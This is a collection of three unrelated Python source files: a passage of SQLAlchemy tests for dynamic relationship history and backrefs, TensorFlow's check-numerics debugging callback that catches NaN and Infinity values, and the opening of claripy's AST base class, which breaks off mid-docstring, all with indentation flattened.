assert a in sess
eq_(list(u.addresses), [a])
a.user = None
if not autoflush:
eq_(list(u.addresses), [a])
if not autoflush:
sess.flush()
eq_(list(u.addresses), [])
def test_backref_autoflush_saveuser(self):
self._backref_test(True, True)
def test_backref_autoflush_savead(self):
self._backref_test(True, False)
def test_backref_saveuser(self):
self._backref_test(False, True)
def test_backref_savead(self):
self._backref_test(False, False)
def test_backref_events(self):
User, Address = self._user_address_fixture(
addresses_args={"backref": "user"})
u1 = User()
a1 = Address()
u1.addresses.append(a1)
is_(a1.user, u1)
def test_no_deref(self):
User, Address = self._user_address_fixture(
addresses_args={"backref": "user", })
session = create_session()
user = User()
user.name = 'joe'
user.fullname = 'Joe User'
user.password = 'Joe\'s secret'
address = Address()
address.email_address = 'joe@joesdomain.example'
address.user = user
session.add(user)
session.flush()
session.expunge_all()
def query1():
session = create_session(testing.db)
user = session.query(User).first()
return user.addresses.all()
def query2():
session = create_session(testing.db)
return session.query(User).first().addresses.all()
def query3():
session = create_session(testing.db)
return session.query(User).first().addresses.all()
eq_(query1(), [Address(email_address='joe@joesdomain.example')])
eq_(query2(), [Address(email_address='joe@joesdomain.example')])
eq_(query3(), [Address(email_address='joe@joesdomain.example')])
class HistoryTest(_DynamicFixture, _fixtures.FixtureTest):
run_inserts = None
def _transient_fixture(self, addresses_args={}):
User, Address = self._user_address_fixture(
addresses_args=addresses_args)
u1 = User()
a1 = Address()
return u1, a1
def _persistent_fixture(self, autoflush=True, addresses_args={}):
User, Address = self._user_address_fixture(
addresses_args=addresses_args)
u1 = User(name='u1')
a1 = Address(email_address='a1')
s = Session(autoflush=autoflush)
s.add(u1)
s.flush()
return u1, a1, s
def _persistent_m2m_fixture(self, autoflush=True, items_args={}):
Order, Item = self._order_item_fixture(items_args=items_args)
o1 = Order()
i1 = Item(description="i1")
s = Session(autoflush=autoflush)
s.add(o1)
s.flush()
return o1, i1, s
def _assert_history(self, obj, compare, compare_passive=None):
if isinstance(obj, self.classes.User):
attrname = "addresses"
elif isinstance(obj, self.classes.Order):
attrname = "items"
eq_(
attributes.get_history(obj, attrname),
compare
)
if compare_passive is None:
compare_passive = compare
eq_(
attributes.get_history(obj, attrname,
attributes.LOAD_AGAINST_COMMITTED),
compare_passive
)
def test_append_transient(self):
u1, a1 = self._transient_fixture()
u1.addresses.append(a1)
self._assert_history(u1,
([a1], [], [])
)
def test_append_persistent(self):
u1, a1, s = self._persistent_fixture()
u1.addresses.append(a1)
self._assert_history(u1,
([a1], [], [])
)
def test_remove_transient(self):
u1, a1 = self._transient_fixture()
u1.addresses.append(a1)
u1.addresses.remove(a1)
self._assert_history(u1,
([], [], [])
)
def test_backref_pop_transient(self):
u1, a1 = self._transient_fixture(addresses_args={"backref": "user"})
u1.addresses.append(a1)
self._assert_history(u1,
([a1], [], []),
)
a1.user = None
# removed from added
self._assert_history(u1,
([], [], []),
)
def test_remove_persistent(self):
u1, a1, s = self._persistent_fixture()
u1.addresses.append(a1)
s.flush()
s.expire_all()
u1.addresses.remove(a1)
self._assert_history(u1,
([], [], [a1])
)
def test_backref_pop_persistent_autoflush_o2m_active_hist(self):
u1, a1, s = self._persistent_fixture(
addresses_args={"backref": backref("user", active_history=True)})
u1.addresses.append(a1)
s.flush()
s.expire_all()
a1.user = None
self._assert_history(u1,
([], [], [a1]),
)
def test_backref_pop_persistent_autoflush_m2m(self):
o1, i1, s = self._persistent_m2m_fixture(
items_args={"backref": "orders"})
o1.items.append(i1)
s.flush()
s.expire_all()
i1.orders.remove(o1)
self._assert_history(o1,
([], [], [i1]),
)
def test_backref_pop_persistent_noflush_m2m(self):
o1, i1, s = self._persistent_m2m_fixture(
items_args={"backref": "orders"}, autoflush=False)
o1.items.append(i1)
s.flush()
s.expire_all()
i1.orders.remove(o1)
self._assert_history(o1,
([], [], [i1]),
)
def test_unchanged_persistent(self):
Address = self.classes.Address
u1, a1, s = self._persistent_fixture()
a2, a3 = Address(email_address='a2'), Address(email_address='a3')
u1.addresses.append(a1)
u1.addresses.append(a2)
s.flush()
u1.addresses.append(a3)
u1.addresses.remove(a2)
self._assert_history(u1,
([a3], [a1], [a2]),
compare_passive=([a3], [], [a2])
)
def test_replace_transient(self):
Address = self.classes.Address
u1, a1 = self._transient_fixture()
a2, a3, a4, a5 = Address(email_address='a2'), \
Address(email_address='a3'), Address(email_address='a4'), \
Address(email_address='a5')
u1.addresses = [a1, a2]
u1.addresses = [a2, a3, a4, a5]
self._assert_history(u1,
([a2, a3, a4, a5], [], [])
)
def test_replace_persistent_noflush(self):
Address = self.classes.Address
u1, a1, s = self._persistent_fixture(autoflush=False)
a2, a3, a4, a5 = Address(email_address='a2'), \
Address(email_address='a3'), Address(email_address='a4'), \
Address(email_address='a5')
u1.addresses = [a1, a2]
u1.addresses = [a2, a3, a4, a5]
self._assert_history(u1,
([a2, a3, a4, a5], [], [])
)
def test_replace_persistent_autoflush(self):
Address = self.classes.Address
u1, a1, s = self._persistent_fixture(autoflush=True)
a2, a3, a4, a5 = Address(email_address='a2'), \
Address(email_address='a3'), Address(email_address='a4'), \
Address(email_address='a5')
u1.addresses = [a1, a2]
u1.addresses = [a2, a3, a4, a5]
self._assert_history(u1,
([a3, a4, a5], [a2], [a1]),
compare_passive=([a3, a4, a5], [], [a1])
)
def test_persistent_but_readded_noflush(self):
u1, a1, s = self._persistent_fixture(autoflush=False)
u1.addresses.append(a1)
s.flush()
u1.addresses.append(a1)
self._assert_history(u1,
([], [a1], []),
compare_passive=([a1], [], [])
)
def test_persistent_but_readded_autoflush(self):
u1, a1, s = self._persistent_fixture(autoflush=True)
u1.addresses.append(a1)
s.flush()
u1.addresses.append(a1)
self._assert_history(u1,
([], [a1], []),
compare_passive=([a1], [], [])
)
def test_missing_but_removed_noflush(self):
u1, a1, s = self._persistent_fixture(autoflush=False)
u1.addresses.remove(a1)
self._assert_history(u1, ([], [], []), compare_passive=([], [], [a1]))
| |
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Eager-graph unified check numerics callback."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import threading
import numpy as np
from tensorflow.core.protobuf import debug_event_pb2
from tensorflow.python.debug.lib import op_callbacks_common
from tensorflow.python.debug.lib import source_utils
from tensorflow.python.framework import op_callbacks
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_debug_ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import compat
from tensorflow.python.util.tf_export import tf_export
# Many ops have benign NaN outputs, and running them with check_numerics
# on will create unwanted errors
# TODO(b/142497024): Replace this whitelist with function decorators in the ops
IGNORE_OP_OUTPUTS = (
# For FusedBatchNorm, if the input tensor is empty then batch_mean and
# batch_variance will be NaN. reserve_space holds intermediate values
# derived from batch_mean and batch_variance used for gradient calculation
(b"FusedBatchNorm", 1), # batch_mean
(b"FusedBatchNorm", 2), # batch_variance
(b"FusedBatchNorm", 3), # reserve_space_1
(b"FusedBatchNorm", 4), # reserve_space_2
# Same as above
(b"FusedBatchNormV2", 1), # batch_mean
(b"FusedBatchNormV2", 2), # batch_variance
(b"FusedBatchNormV2", 3), # reserve_space_1
(b"FusedBatchNormV2", 4), # reserve_space_2
# Same as above, but reserve_space_3 holds additional intermediate values
(b"FusedBatchNormV3", 1), # batch_mean
(b"FusedBatchNormV3", 2), # batch_variance
(b"FusedBatchNormV3", 3), # reserve_space_1
(b"FusedBatchNormV3", 4), # reserve_space_2
(b"FusedBatchNormV3", 5), # reserve_space_3
)
# Some frequently used ops are generally safe and we can skip them to reduce
# overhead. NOTE: This list is compiled by observing operations called by
# models in practice and is not a comprehensive list of safe operations.
SAFE_OPS = (
b"Concat",
b"ConcatV2",
b"ExpandDims",
b"Fill",
b"Gather",
b"Maximum",
b"Minimum",
b"Reshape",
b"Slice",
b"Squeeze",
b"Stack",
b"StridedSlice",
b"StridedSliceGrad",
b"TensorListConcatV2",
b"TensorListGather",
b"TensorListGetItem",
b"TensorListPopBack",
b"TensorListStack",
b"Transpose",
b"Unpack",
)
_state = threading.local()
def limit_string_length(string, max_len=50):
"""Limit the length of input string.
Args:
string: Input string.
max_len: (int or None) If int, the length limit. If None, no limit.
Returns:
Possibly length-limited string.
"""
if max_len is None or len(string) <= max_len:
return string
else:
return "..." + string[len(string) - max_len:]
# A dictionary that supports looking up the original input tensor names.
_CHECK_NUMERICS_INPUT_LOOKUP = collections.defaultdict(dict)
def _maybe_lookup_original_input_tensor(graph, tensor):
if (graph and
graph in _CHECK_NUMERICS_INPUT_LOOKUP and
tensor.name in _CHECK_NUMERICS_INPUT_LOOKUP[graph]):
return _CHECK_NUMERICS_INPUT_LOOKUP[graph][tensor.name]
else:
return tensor
def get_check_numerics_error_message(slot,
num_outputs,
op_type,
tensor,
inputs,
graph=None,
traceback=None,
stack_height_limit=30,
path_length_limit=50):
"""Create a meaningful and user-friendly error message about offending tensor.
The error message reveals the following info about the op that outputs
NaN/Infinity: dtype, shape (to the extent known at graph-construction time),
input tensors, stack trace for op creation (if is graph mode).
Args:
slot: (int) slot index of the tensor output.
num_outputs: (int) total number of outputs of the op.
op_type: (str) Type of the that generates `tensor`.
tensor: (Tensor) the offending tensor, i.e., the tensor that contains
Infinities or NaNs.
inputs: (array of Tensor) inputs to the op that generates `tensor`.
graph: (tf.Graph) the graph object that `tensor` belongs to. Available only
under graph mode.
traceback: (list of trace frames) the stack trace of the op's creation.
Available only under graph model.
stack_height_limit: (int or None) If int, limit to the height of the stack
trace printed in the error message. If None, no limit to the height.
path_length_limit: (int or None) Length limit for file paths included in the
formatted stack trace.
Returns:
(str) A formatted error message.
"""
eager_vs_graph_qualifier = "graph" if graph else "eagerly-executing"
message = "\n"
message += (
"\n!!! Detected Infinity or NaN in output %d of "
"%s op \"%s\" (# of outputs: %d) !!!\n" %
(slot, eager_vs_graph_qualifier, op_type, num_outputs))
message += " dtype: %s\n" % tensor.dtype
message += " shape: %s\n" % (tensor.shape,)
if not graph:
# This is an eager tensor. We can get its numpy value and count
# NaNs and Infs.
is_inf = np.isinf(tensor)
num_neg_inf = np.sum(np.logical_and(np.less(tensor, 0.), is_inf))
num_pos_inf = np.sum(np.logical_and(np.greater(tensor, 0.), is_inf))
num_nan = np.sum(np.isnan(tensor))
if num_neg_inf > 0:
message += " # of -Inf elements: %s\n" % num_neg_inf
if num_pos_inf > 0:
message += " # of +Inf elements: %s\n" % num_pos_inf
if num_nan:
message += " # of +NaN elements: %s\n" % num_nan
if len(inputs) > 1:
message += "\n Input tensors (%d):\n" % len(inputs)
for slot, input_tensor in enumerate(inputs):
message += " %d: %s\n" % (
slot, _maybe_lookup_original_input_tensor(graph, input_tensor))
elif len(inputs) == 1:
message += "\n Input tensor: %s\n" % (
_maybe_lookup_original_input_tensor(graph, inputs[0]))
if graph and hasattr(graph, "name") and graph.name:
message += " Graph name: \"%s\"\n" % graph.name
# Format the stack trace for the op's creation. We omit files that
# belong to tensorflow itself.
if graph and traceback:
message += (
"\n Stack trace of op's creation (\"->\": inferred user code):\n")
if stack_height_limit is not None and len(traceback) > stack_height_limit:
num_omitted_frames = len(traceback) - stack_height_limit
message += " + ... (Omitted %d frames)\n" % num_omitted_frames
for filepath, lineno, function_name, source_line in traceback[
-stack_height_limit:]:
user_code_indicator = " "
if not source_utils.guess_is_tensorflow_py_library(filepath):
user_code_indicator = " -> "
message += " + %s (L%d) %s\n" % (
limit_string_length(filepath, path_length_limit), lineno,
function_name)
if source_line is not None:
message += "%s| %s\n" % (user_code_indicator, source_line)
message += "\n"
return message
def _debug_summary(x):
return gen_debug_ops.debug_numeric_summary_v2(
x,
tensor_debug_mode=(
debug_event_pb2.TensorDebugMode.REDUCE_INF_NAN_THREE_SLOTS))
class CheckNumericsCallback(object):
"""Wrapper for the numerics-checking callback for thread locality."""
def __init__(self, stack_height_limit, path_length_limit):
self._stack_height_limit = stack_height_limit
self._path_length_limit = path_length_limit
def callback(self,
op_type,
inputs,
attrs,
outputs,
op_name=None,
graph=None):
"""Eager-function unified callback for checking numerics."""
del attrs, op_name # Unused
op_type_bytes = compat.as_bytes(op_type)
is_v1_graph_mode = not ops.executing_eagerly_outside_functions()
if (op_type_bytes in op_callbacks_common.OP_CALLBACK_SKIP_OPS or
op_type_bytes in SAFE_OPS):
return None
if graph:
# Under graph mode. Insert check_numerics op.
instrumented_outputs = []
for slot, output in enumerate(outputs):
if (output.dtype.is_floating and
(op_type_bytes, slot) not in IGNORE_OP_OUTPUTS):
checked_output = array_ops.check_numerics_v2(
# TF v2 has automatic control dependencies added to stateful async
# ops, which allows us to run check_numerics asynchronously.
# In the above case we use debug_summary to reduce all output
# tensors asynchronously from the op being checked and then
# process the tensor summary with check_numerics.
output if is_v1_graph_mode else _debug_summary(output),
get_check_numerics_error_message(
slot,
len(outputs),
op_type,
output,
inputs,
graph=graph,
traceback=output.op.traceback))
_CHECK_NUMERICS_INPUT_LOOKUP[graph][checked_output.name] = output
instrumented_outputs.append(
checked_output if is_v1_graph_mode else output)
else:
instrumented_outputs.append(output)
return instrumented_outputs
else:
if op_type_bytes == b"CheckNumericsV2":
# TODO(b/140334369): Remove this special casing logic once op_callback.
# automatically prevents infinite recursion in eager mode.
return None
# Under eager mode. Eagerly execute check_numerics op.
for slot, output in enumerate(outputs):
if (output.dtype.is_floating and
(op_type_bytes, slot) not in IGNORE_OP_OUTPUTS):
array_ops.check_numerics_v2(
output,
get_check_numerics_error_message(
slot, len(outputs), op_type, output, inputs,
stack_height_limit=self._stack_height_limit,
path_length_limit=self._path_length_limit))
@tf_export("debugging.enable_check_numerics")
def enable_check_numerics(stack_height_limit=30,
path_length_limit=50):
r"""Enable tensor numerics checking in an eager/graph unified fashion.
The numerics checking mechanism will cause any TensorFlow eager execution or
graph execution to error out as soon as an op's output tensor contains
infinity or NaN.
This method is idempotent. Calling it multiple times has the same effect
as calling it once.
This method takes effect only on the thread in which it is called.
When a op's float-type output tensor contains any Infinity or NaN, an
`tf.errors.InvalidArgumentError` will be thrown, with an error message that
reveals the following information:
- The type of the op that generated the tensor with bad numerics.
- Data type (dtype) of the tensor.
- Shape of the tensor (to the extent known at the time of eager execution
or graph construction).
- Name of the containing graph (if available).
- (Graph mode only): The stack trace of the intra-graph op's creation,
with a stack-height limit and a path-length limit for visual clarity.
The stack frames that belong to the user's code (as opposed to
tensorflow's internal code) are highlighted with a text arrow ("->").
- (Eager mode only): How many of the offending tensor's elements are
`Infinity` and `NaN`, respectively.
Once enabled, the check-numerics mechanism can be disabled by using
`tf.debugging.disable_check_numerics()`.
Example usage:
1. Catching infinity during the execution of a `tf.function` graph:
```py
import tensorflow as tf
tf.debugging.enable_check_numerics()
@tf.function
def square_log_x_plus_1(x):
v = tf.math.log(x + 1)
return tf.math.square(v)
x = -1.0
# When the following line runs, a function graph will be compiled
# from the Python function `log_x_plus_1()`. Due to the
# `enable_check_numerics()` call above, the graph will contain
# numerics checking ops that will run during the function graph's
# execution. The function call generates an -infinity when the Log
# (logarithm) op operates on the output tensor of the Add op.
# The program errors out at this line, printing an error message.
y = log_x_plus_1(x)
z = -y
```
2. Catching NaN during eager execution:
```py
import numpy as np
import tensorflow as tf
tf.debugging.enable_check_numerics()
x = np.array([[0.0, -1.0], [4.0, 3.0]])
# The following line executes the Sqrt op eagerly. Due to the negative
# element in the input array, a NaN is generated. Due to the
# `enable_check_numerics()` call above, the program errors immediately
# at this line, printing an error message.
y = tf.math.sqrt(x)
z = tf.matmul(y, y)
```
Args:
stack_height_limit: Limit to the height of the printed stack trace.
Applicable only to ops in `tf.function`s (graphs).
path_length_limit: Limit to the file path included in the printed stack
trace. Applicable only to ops in `tf.function`s (graphs).
"""
if not hasattr(_state, "check_numerics_callback"):
_state.check_numerics_callback = CheckNumericsCallback(
stack_height_limit, path_length_limit)
op_callbacks.add_op_callback(_state.check_numerics_callback.callback)
logging.info(
"Enabled check-numerics callback in thread %s",
threading.current_thread().name)
@tf_export("debugging.disable_check_numerics")
def disable_check_numerics():
"""Disable the eager/graph unified numerics checking mechanism.
This method can be used after a call to `tf.debugging.enable_check_numerics()`
to disable the numerics-checking mechanism that catches inifnity and NaN
values output by ops executed eagerly or in tf.function-compiled graphs.
This method is idempotent. Calling it multiple times has the same effect
as calling it once.
This method takes effect only on the thread in which it is called.
"""
if not hasattr(_state, "check_numerics_callback"):
return
try:
op_callbacks.remove_op_callback(_state.check_numerics_callback.callback)
delattr(_state, "check_numerics_callback")
logging.info(
"Disabled check-numerics callback in thread %s",
threading.current_thread().name)
except KeyError:
# Tolerate disabling the check numerics callback without
# enable_check_numerics() being called first.
pass
| |
import os
import sys
import struct
import weakref
import hashlib
import itertools
import collections
import cPickle as pickle
import logging
l = logging.getLogger("claripy.ast")
import ana
WORKER = bool(os.environ.get('WORKER', False))
md5_unpacker = struct.Struct('2Q')
#pylint:enable=unused-argument
#pylint:disable=unidiomatic-typecheck
def _inner_repr(a, **kwargs):
if isinstance(a, Base):
return a.__repr__(inner=True, **kwargs)
else:
return repr(a)
class ASTCacheKey(object):
def __init__(self, a):
self.ast = a
def __hash__(self):
return hash(self.ast)
def __eq__(self, other):
return hash(self.ast) == hash(other.ast)
def __repr__(self):
return '<Key %s %s>' % (self.ast._type_name(), self.ast.__repr__(inner=True))
#
# AST variable naming
#
var_counter = itertools.count()
_unique_names = True
def _make_name(name, size, explicit_name=False, prefix=""):
if _unique_names and not explicit_name:
return "%s%s_%d_%d" % (prefix, name, var_counter.next(), size)
else:
return name
class Base(ana.Storable):
"""
An AST tracks a tree of operations on arguments. It has the following methods:
op: the operation that is being done on the arguments
args: the arguments that are being used
length: the length (in bits)
AST objects have *hash identity*. This means that an AST that has the same hash as
another AST will be the *same* object. For example, the following is true:
a, b = two different ASTs
c = b + a
d = b + a
assert c is d
This is done to better support serialization and better manage memory.
"""
__slots__ = [ 'op', 'args', 'variables', 'symbolic', '_hash', '_simplified',
'_cache_key', '_errored', '_eager_backends', 'length', '_excavated', '_burrowed', '_uninitialized',
'_uc_alloc_depth', 'annotations', 'simplifiable', '_uneliminatable_annotations', '_relocatable_annotations']
_hash_cache = weakref.WeakValueDictionary()
FULL_SIMPLIFY=1
LITE_SIMPLIFY=2
UNSIMPLIFIED=0
def __new__(cls, op, args, **kwargs):
"""
This is called when you create a new Base object, whether directly or through an operation.
It finalizes the arguments (see the _finalize function, above) and then computes
a hash. If an AST of this hash already exists, it returns that AST. Otherwise,
it creates, initializes, and returns the AST.
:param op: The AST operation ('__add__', 'Or', etc)
:param args: The arguments to the AST operation (i.e., the objects to add)
:param variables: The symbolic variables present in the AST (default: empty set)
:param symbolic: A flag saying whether or not the AST is symbolic (default: False)
:param length: An integer specifying the length of this AST (default: None)
:param collapsible: A flag of whether or not Claripy can feel free to collapse this AST. This is mostly used
to keep Claripy from collapsing Reverse operations, so that they can be undone with
another Reverse.
:param simplified: A measure of how simplified this AST is. 0 means unsimplified, 1 means fast-simplified
(basically, just undoing the Reverse op), and 2 means simplified through z3.
:param errored: A set of backends that are known to be unable to handle this AST.
:param eager_backends: A list of backends with which to attempt eager evaluation
:param annotations: A frozenset of annotations applied onto this AST.
"""
#if any(isinstance(a, BackendObject) for a in args):
# raise Exception('asdf')
# fix up args and kwargs
a_args = tuple((a.to_claripy() if isinstance(a, BackendObject) else a) for a in args)
if 'symbolic' not in kwargs:
kwargs['symbolic'] = any(a.symbolic for a in a_args if isinstance(a, Base))
if 'variables' not in kwargs:
kwargs['variables'] = frozenset.union(
frozenset(), *(a.variables for a in a_args if isinstance(a, Base))
)
elif type(kwargs['variables']) is not frozenset: #pylint:disable=unidiomatic-typecheck
kwargs['variables'] = frozenset(kwargs['variables'])
if 'errored' not in kwargs:
kwargs['errored'] = set.union(set(), *(a._errored for a in a_args if isinstance(a, Base)))
if 'add_variables' in kwargs:
kwargs['variables'] = kwargs['variables'] | kwargs['add_variables']
eager_backends = list(backends._eager_backends) if 'eager_backends' not in kwargs else kwargs['eager_backends']
if not kwargs['symbolic'] and eager_backends is not None and op not in operations.leaf_operations:
for eb in eager_backends:
try:
r = operations._handle_annotations(eb._abstract(eb.call(op, args)), args)
if r is not None:
return r
else:
eager_backends.remove(eb)
except BackendError:
eager_backends.remove(eb)
# if we can't be eager anymore, null out the eagerness
kwargs['eager_backends'] = None
# whether this guy is initialized or not
if 'uninitialized' not in kwargs:
kwargs['uninitialized'] = None
if 'uc_alloc_depth' not in kwargs:
kwargs['uc_alloc_depth'] = None
if 'annotations' not in kwargs:
kwargs['annotations'] = ()
h = Base._calc_hash(op, a_args, kwargs)
self = cls._hash_cache.get(h, None)
if self is None:
self = super(Base, cls).__new__(cls, op, a_args, **kwargs)
self.__a_init__(op, a_args, **kwargs)
self._hash = h
cls._hash_cache[h] = self
# else:
# if self.args != f_args or self.op != f_op or self.variables != f_kwargs['variables']:
# raise Exception("CRAP -- hash collision")
return self
def __init__(self, *args, **kwargs):
pass
@staticmethod
def _calc_hash(op, args, k):
"""
Calculates the hash of an AST, given the operation, args, and kwargs.
:param op: The operation.
:param args: The arguments to the operation.
:param kwargs: A dict including the 'symbolic', 'variables', and 'length' items.
:returns: a hash.
"""
args_tup = tuple(long(a) if type(a) is int else (a if type(a) in (long, float) else hash(a)) for a in args)
to_hash = (op, args_tup, k['symbolic'], hash(k['variables']), str(k.get('length', None)), hash(k.get('annotations', None)))
# Why do we use md5 when it's broken? Because speed is more important
# than cryptographic integrity here. Then again, look at all those
# allocations we're doing here... fast python is painful.
hd = hashlib.md5(pickle.dumps(to_hash, -1)).digest()
return md5_unpacker.unpack(hd)[0] # 64 bits
def _get_hashables(self):
return self.op, tuple(str(a) if type(a) in (int, long, float) else hash(a) for a in self.args), self.symbolic, hash(self.variables), str(self.length)
#pylint:disable=attribute-defined-outside-init
def __a_init__(self, op, args, variables=None, symbolic=None, length=None, collapsible=None, simplified=0, errored=None, eager_backends=None, add_variables=None, uninitialized=None, uc_alloc_depth=None, annotations=None): #pylint:disable=unused-argument
"""
Initializes an AST. Takes the same arguments as Base.__new__()
"""
self.op = op
self.args = args
self.length = length
self.variables = frozenset(variables)
self.symbolic = symbolic
self._eager_backends = eager_backends
self._errored = errored if errored is not None else set()
self._simplified = simplified
self._cache_key = ASTCacheKey(self)
self._excavated = None
self._burrowed = None
self._uninitialized = uninitialized
self._uc_alloc_depth = uc_alloc_depth
self.annotations = annotations
ast_args = tuple(a for a in self.args if isinstance(a, Base))
self._uneliminatable_annotations = frozenset(itertools.chain(
itertools.chain.from_iterable(a._uneliminatable_annotations for a in ast_args),
tuple(a for a in self.annotations if not a.eliminatable and not a.relocatable)
))
self._relocatable_annotations = collections.OrderedDict((e, True) for e in tuple(itertools.chain(
itertools.chain.from_iterable(a._relocatable_annotations for a in ast_args),
tuple(a for a in self.annotations if not a.eliminatable and a.relocatable)
))).keys()
if len(args) == 0:
raise ClaripyOperationError("AST with no arguments!")
#if self.op != 'I':
# for a in args:
# if not isinstance(a, Base) and type(a) not in (int, long, bool, str, unicode):
# import ipdb; ipdb.set_trace()
# l.warning(ClaripyOperationError("Un-wrapped native object of type %s!" % type(a)))
#pylint:enable=attribute-defined-outside-init
def make_uuid(self, uuid=None):
"""
This overrides the default ANA uuid with the hash of the AST. UUID is slow, and we'll soon replace it from ANA
itself, and this will go away.
:returns: a string representation of the AST hash.
"""
u = getattr(self, '_ana_uuid', None)
if u is None:
u = str(self._hash) if uuid is None else uuid
ana.get_dl().uuid_cache[u] = self
setattr(self, '_ana_uuid', u)
return u
@property
def uuid(self):
return self.ana_uuid
def __hash__(self):
return self._hash
@property
def cache_key(self):
return self._cache_key
#
# Serialization support
#
def _ana_getstate(self):
"""
Support for ANA serialization.
"""
return self.op, self.args, self.length, self.variables, self.symbolic, self._hash, self.annotations
def _ana_setstate(self, state):
"""
Support for ANA deserialization.
"""
op, args, length, variables, symbolic, h, annotations = state
Base.__a_init__(self, op, args, length=length, variables=variables, symbolic=symbolic, annotations=annotations)
self._hash = h
Base._hash_cache[h] = self
#
# Collapsing and simplification
#
#def _models_for(self, backend):
# for a in self.args:
# backend.convert_expr(a)
# else:
# yield backend.convert(a)
def make_like(self, *args, **kwargs):
all_operations = operations.leaf_operations_symbolic | {'union'}
if 'annotations' not in kwargs: kwargs['annotations'] = self.annotations
if 'variables' not in kwargs and self.op in all_operations: kwargs['variables'] = self.variables
if 'uninitialized' not in kwargs: kwargs['uninitialized'] = self._uninitialized
if 'symbolic' not in kwargs and self.op in all_operations: kwargs['symbolic'] = self.symbolic
return type(self)(*args, **kwargs)
def _rename(self, new_name):
if self.op not in { 'BVS', 'BoolS', 'FPS' }:
raise ClaripyOperationError("rename is only supported on leaf nodes")
new_args = (new_name,) + self.args[1:]
return self.make_like(self.op, new_args, length=self.length, variables={new_name})
#
# Annotations
#
def _apply_to_annotations(self, f):
return self.make_like(self.op, self.args, annotations=f(self.annotations))
def append_annotation(self, a):
"""
Appends an annotation to this AST.
:param a: the annotation to append
:returns: a new AST, with the annotation added
"""
return self._apply_to_annotations(lambda alist: alist + (a,))
def append_annotations(self, new_tuple):
"""
Appends several annotations to this AST.
:param new_tuple: the tuple of annotations to append
:returns: a new AST, with the annotations added
"""
return self._apply_to_annotations(lambda alist: alist + new_tuple)
def annotate(self, *args):
"""
Appends annotations to this AST.
:param *args: the tuple of annotations to append
:returns: a new AST, with the annotations added
"""
return self._apply_to_annotations(lambda alist: alist + args)
def insert_annotation(self, a):
"""
Inserts an annotation to this AST.
:param a: the annotation to insert
:returns: a new AST, with the annotation added
"""
return self._apply_to_annotations(lambda alist: (a,) + alist)
def insert_annotations(self, new_tuple):
"""
Inserts several annotations to this AST.
:param new_tuple: the tuple of annotations to insert
:returns: a new AST, with the annotations added
"""
return self._apply_to_annotations(lambda alist: new_tuple + alist)
def replace_annotations(self, new_tuple):
"""
Replaces annotations on this AST.
:param new_tuple: the tuple of annotations to replace the old annotations with
:returns: a new AST, with the annotations added
"""
return self._apply_to_annotations(lambda alist: new_tuple)
def remove_annotation(self, a):
"""
Removes an annotation from this AST.
:param a: the annotation to remove
:returns: a new AST, with the annotation removed
"""
return self._apply_to_annotations(lambda alist: tuple(oa for oa in alist if oa != a))
def remove_annotations(self, remove_sequence):
"""
Removes several annotations from this AST.
:param remove_sequence: a sequence/set of the annotations to remove
:returns: a new AST, with the annotations removed
"""
return self._apply_to_annotations(lambda alist: tuple(oa for oa in alist if oa not in remove_sequence))
#
# Viewing and debugging
#
def dbg_repr(self, prefix=None):
try:
if prefix is not None:
new_prefix = prefix + " "
s = prefix + "<%s %s (\n" % (type(self).__name__, self.op)
for a in self.args:
s += "%s,\n" % (a.dbg_repr(prefix=new_prefix) if hasattr(a, 'dbg_repr') else (new_prefix + repr(a)))
s = s[:-2] + '\n'
s += prefix + ")>"
return s
else:
return "<%s %s (%s)>" % (type(self).__name__, self.op, ', '.join(a.dbg_repr() if hasattr(a, 'dbg_repr') else repr(a) for a in self.args))
except RuntimeError:
e_type, value, traceback = sys.exc_info()
raise ClaripyRecursionError, ("Recursion limit reached during display. I sorry.", e_type, value), traceback
def _type_name(self):
return self.__class__.__name__
def shallow_repr(self, max_depth=8):
return self.__repr__(max_depth=max_depth)
def __repr__(self, inner=False, max_depth=None, explicit_length=False):
if max_depth is not None and max_depth <= 0:
return '<...>'
if max_depth is not None:
max_depth -= 1
if WORKER:
return '<AST something>'
try:
if self.op in operations.reversed_ops:
op = operations.reversed_ops[self.op]
args = self.args[::-1]
else:
op = self.op
args = self.args
if op == 'BVS' and inner:
value = args[0]
elif op == 'BVS':
value = "%s" % args[0]
extras = [ ]
if args[1] is not None:
extras.append("min=%s" % args[1])
if args[2] is not None:
extras.append("max=%s" % args[2])
if args[3] is not None:
extras.append("stride=%s" % args[3])
if args[4] is True:
extras.append("UNINITIALIZED")
if len(extras) != 0:
value += "{" + ", ".join(extras) + "}"
elif op == 'BoolV':
value = str(args[0])
elif op == 'BVV':
if self.args[0] is None:
value = '!'
elif self.args[1] < 10:
value = format(self.args[0], '')
else:
value = format(self.args[0], '#x')
value += ('#' + str(self.length)) if explicit_length else ''
elif op == 'If':
value = 'if {} then {} else {}'.format(_inner_repr(args[0], max_depth=max_depth),
_inner_repr(args[1], max_depth=max_depth),
_inner_repr(args[2], max_depth=max_depth))
if inner:
value = '({})'.format(value)
elif op == 'Not':
value = '!{}'.format(_inner_repr(args[0], max_depth=max_depth))
elif op == 'Extract':
value = '{}[{}:{}]'.format(_inner_repr(args[2], max_depth=max_depth), args[0], args[1])
elif op == 'ZeroExt':
value = '0#{} .. {}'.format(args[0], _inner_repr(args[1], max_depth=max_depth))
if inner:
value = '({})'.format(value)
elif op == 'Concat':
value = ' .. '.join(_inner_repr(a, explicit_length=True, max_depth=max_depth) for a in self.args)
elif len(args) == 2 and op in operations.infix:
value = '{} {} {}'.format(_inner_repr(args[0], max_depth=max_depth),
operations.infix[op],
_inner_repr(args[1], max_depth=max_depth))
if inner:
value = '({})'.format(value)
else:
value = "{}({})".format(op,
', '.join(_inner_repr(a, max_depth=max_depth) for a in args))
if not inner:
value = '<{} {}>'.format(self._type_name(), value)
return value
except RuntimeError:
e_type, value, traceback = sys.exc_info()
raise ClaripyRecursionError, ("Recursion limit reached during display. I sorry.", e_type, value), traceback
@property
def depth(self):
"""
